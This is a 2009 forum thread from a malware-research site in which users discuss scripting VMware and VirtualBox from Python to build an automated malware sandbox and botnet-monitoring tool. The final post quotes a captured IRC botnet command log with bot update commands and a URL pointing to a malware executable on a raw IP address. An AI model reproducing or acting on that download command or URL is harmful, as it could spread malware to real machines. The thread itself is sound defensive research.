Malware Domain List

Malware Related => Tools of the trade / Internet News => Topic started by: log0 on August 09, 2009, 12:02:56 pm

Title: What tools can I use to script VMWare Workstation in Python?
Post by: log0 on August 09, 2009, 12:02:56 pm
Hi all gurus,

Could use some help and directions.

I have Windows in VMware that I want to control from my VM Host to start/stop/revert/run programs. I am aiming to build an automated, simplified but specialized malware sandbox to extract pcap files (yadayada... anubis is too slow). However, the Pyvix doesn't seem to be updated for 3 years already, and it isn't just the compilation issue ( it seems ) but mismatching binaries, and so.

My questions :
1. If I want to script VMware workstation in Python, what are the solutions out there?
2. What are the usual solutions as used by you experts in industries and focused academics?

Thank you.

Log0



Title: Re: What tools can I use to script VMWare Workstation in Python?
Post by: SysAdMini on August 09, 2009, 12:22:01 pm
You have to install VMWARE VIX API first.

http://www.vmware.com/support/developer/vix-api/

This api provides bindings for for C, Perl, and COM (Visual Basic, VBscript, C#).
VMWARE doesn't provide bindings for python,but there are python bindings.
Look here:

http://groups.google.com/group/vmkernelnewbies/browse_thread/thread/b910fe85b1eebcb2

I haven't used the python bindings, so I don't know how well it works.

 
Title: Re: What tools can I use to script VMWare Workstation in Python?
Post by: log0 on August 09, 2009, 02:08:34 pm
Hi SysAdMini,

Yes I have installed the ViX. =)

Here is the extract I obtained from pyvix, it looks oooooooooooooooold !!!!!!

pyvix-2006.07.18-source.zip          32.2 KiB     Tue Jul 18 2006 14:44     939

So, I'm just curious if it's a "declared dead" library?

===

BTW, so most people still use the C interface of ViX ( perhaps Perl? ) to automate only?
Title: Re: What tools can I use to script VMWare Workstation in Python?
Post by: log0 on August 09, 2009, 02:42:05 pm
Aha, that new updated code works better... got some new errors, but there goes the progress. Thanks SysAdMini. =)
Title: Re: What tools can I use to script VMWare Workstation in Python?
Post by: log0 on August 09, 2009, 04:14:12 pm
Didn't really mean to bug... anyone got this error?

I found this is a pretty common unanswered problem ... not any solutions I got ...

VIX_E_WRAPPER_SERVICEPROVIDER_NOT_FOUND      = 22003
pyvix.vix.VIXException: The system returned an error. Communication with the virtual machine may have been interrupted

I used the powerOn.c helloworld code provided by Vmware. Anyway..it fails at connect.
I'll continue to work on and see what's going to come back... but if anyone have met this, please kindly offer advice.

I really need to post an article on this common problem after I've solved it. =)

Thank you very much.
Title: Re: What tools can I use to script VMWare Workstation in Python?
Post by: log0 on August 11, 2009, 05:05:09 pm
Yayayaya, I abandoned vmware and picked up (free) virtualbox. Somehow the installation of ViX didn't work quite well, but why bother fix when there's easier way. Waste no time.

There goes vboxmanage , which does it in a simpler way.

for those interested, I'm building a automated tool for infiltrating botnets... let's see what comes out.

Thanks.
Title: Re: What tools can I use to script VMWare Workstation in Python?
Post by: MysteryFCM on August 12, 2009, 06:33:15 pm
Look forward to seeing the results :) (looking into setting up automated analysis myself too)
Title: Re: What tools can I use to script VMWare Workstation in Python?
Post by: SysAdMini on August 12, 2009, 06:40:05 pm
I have tested virtualbox a few months ago. I was unable to setup a network bridge to my wireless lan adapter.
I'm wondering if it works in the current virtualbox version. If yes, then I would give it a second chance.
Title: Re: What tools can I use to script VMWare Workstation in Python?
Post by: log0 on August 22, 2009, 04:40:53 am
>>SysAdMini

oops... a lil busy and then workin' then.

Didn't try bridge wireless before, top two from google :
http://ubuntuforums.org/showthread.php?t=724783h
http://forums.virtualbox.org/viewtopic.php?t=1787

Any luck?

I basically have a tool that can grep traffic for myself, now need to piece up a bot and everything altogether.

===

>> MysteryFCM

Sure, it is just a few piece of spread out technology pieced together... I guess a lot of ppl in MDL alrdy got them?
Title: Re: What tools can I use to script VMWare Workstation in Python?
Post by: log0 on August 23, 2009, 01:00:32 pm
I guess most of these are basic tools to most ppl...everyone gotta build their own guns!

The malware caught - 6/41 ( 14.63 % ) ouch.


Basic

2009-08-23 18:27:20,644 - log-6 - INFO - Received : [:irc.efnet.com 332 [ #xx6 :.flushdns |.down -S |.update -S |.update http://94.76.194.116/xx8.exe x5s5g6q3x1n3.exe x5s5g6q3x1n3]
...

but sadly, still doing it wrong. =)

2009-08-23 18:27:23,560 - log-6 - INFO - Received : [ERROR :Closing Link: [[<my ip>] (Client hat die Verbindung getrennt)]

German stuffs.

Workin' workin' ...